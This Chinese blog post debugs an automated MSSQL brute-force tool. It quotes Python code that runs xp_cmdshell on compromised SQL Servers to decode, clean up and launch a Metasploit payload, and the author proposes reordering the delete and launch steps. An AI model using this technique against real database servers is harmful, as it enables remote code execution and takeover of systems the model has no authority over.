首页 > 数据库 >(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因

(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因

时间:2023-04-26 18:33:41浏览次数:35  
标签:Force cmdshell query5 ttempt Auto metasploit% randomgen print xp


今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题:

print "Metasploit payload delivered.."
       print "Converting our payload to binary, this may take a few..."
       query5=("""xp_cmdshell 'h2b metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       print "Cleaning up..."
       query5=("""xp_cmdshell 'del metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       query5=("""xp_cmdshell 'del h2b.exe'""")
       printquery=mssql.execute_query(query5)
       print "Launching payload, this could take up to a minute..."
       print "When finished, close the metasploit handler window to return to other compromised SQL Servers."
       query5=("""xp_cmdshell 'metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       pause=raw_input("Press enter to return back to compromised SQL Servers.")

既然已经删除metasploit,为什么还要运行:

query5=("""xp_cmdshell 'metasploit%s'""" % (randomgen))



我觉得应该去掉:


query5=("""xp_cmdshell 'del metasploit%s'""" % (randomgen))



初始化的时候再去删除。



(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因_sed


(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因_sql_02

标签:Force,cmdshell,query5,ttempt,Auto,metasploit%,randomgen,print,xp
From: https://blog.51cto.com/u_1002776/6228458

相关文章

  • 全球不到400人拥有该证书,成为Salesforce技术架构师前景如何?
    Salesforce技术架构师认证于2011年推出,是认证领域的“巅峰”。迄今为止,全球范围内的技术架构师还不到400人,成为技术架构师似乎是一个虚幻的目标。技术架构师是多年学习、多项必备认证和经验的累积成果,仅考试费用就高达6000美元。并且,还需要投入大量时间学习相关知识,参加相关培训......
  • Educational Codeforces Round 147 (Rated for Div. 2)
    Preface补题这周比赛挺少,不过后面可能就很少有时间补以前的比赛了的说现在除了要做学校的集训专题外,还要刷一下蓝桥杯国赛的题,可以说是很忙碌了而且由于JAVA的期末考试要来了,为了熟悉下语法以后补题的时候前面的题目可能会用JAVA来写(其实我写的JAVA看起来和C++真没啥区别)A.......
  • AutoGPT:您需要知道的一切
    在这篇文章中,我们详细介绍了AutoGPT。在本教程结束时,您不仅可以了解它的工作原理,还可以在您的系统上运行它。AutoGPT在媒体上获得了极大的普及。它已成为之后各种社交媒体平台上谈论最多的话题之一。它不仅吸引了人工智能界人士的注意,还吸引了其他背景人士的注意。各国的媒体......
  • 为什么AutoGPT是AI领域的一件大事
    开发人员正在构建自动化ChatGPT提示的方法,鼓励该工具执行自主连接任务,这将减轻用户在使用它时遇到的一些限制。例如,开发人员ToranBruceRichards在GitHub上推出了他的开源应用程序Auto-GPT,这是一个流行的基于Web的平台,开发人员可以在其中存储代码,与他人合作并跟踪代码更改。它......
  • AutoGPT也有Web UI了
    AutoGPT能够在你的电脑上做任何你想做的事情,并且我们在前面的文章中也介绍了其他的一些类似的应用。但是AutoGPT最大的一个问题是只能通过命令行界面(CLI)运行,这样就算是专业的技术人员使用起来也很麻烦,想想StableDiffusion,他的WebUI就非常好用。但是现在AutoGPT也有了WebUI......
  • spring 依赖注入用@Autowired报错 No unique bean of type
    1,报错如下Causedby:org.springframework.beans.factory.NoSuchBeanDefinitionException:Nouniquebeanoftype[org.springframework.amqp.rabbit.core.RabbitTemplate]isdefined:expectedsinglematchingbeanbutfound4:[jmsTemplate1,jmsTemplate2,jmsTemplate3......
  • Codeforces 1781G - Diverse Coloring(构造)
    vp时候想到大致思路了,但是死活调不对,赛后套取cf的数据调了好久才过/ll首先直觉告诉我们答案不会太大。稍微猜一猜可以猜出除了四个点的菊花之外答案都是\(n\bmod2\),下面我们来通过构造证明这件事情。首先,链的情况是trivial的,直接根据奇偶性间隔染色即可。如果不是链,那么......
  • Educational Codeforces Round 147(A~E)(补提记录)
    EducationalCodeforcesRound147(RatedforDiv.2)A:题意:每个问号都能被替换成0~9,求替换每个问号后所能的到的数的数量注:所得到的序列不能有前导0思路:先判断第一位是什么,作为特判,为0,则不能得到任何数输出0,为?则答案×9再依次枚举之后的每一个数,若为问号答案*10#include<io......
  • 苹果Mac电脑安装AutoCAD 2024卡死无响应解决方法
    期待已久的AutoCAD2024已经更新了,许多朋友第一时间卸载电脑上的AutoCAD2023,转手下载了最新版的AutoCAD2024,但是安装的时候发现双击包内的InstallAutodeskAutoCAD2024 安装程序后总是会出现程序卡死无响应的情况,不管是重启电脑,还是重新从官网下载安装包都不行。AutoCAD2024......
  • Codeforces Round 867 (Div. 3)(A-C)
    A.TubeTubeFeed签到题思路往后走,每次减一,记录当前所能得到最大的bi完整代码#include<bits/stdc++.h>usingnamespacestd;#definelllonglonginlinellread(){lls=0;charg=getchar();while(g>'9'||g<'0')g=getchar();while(g&g......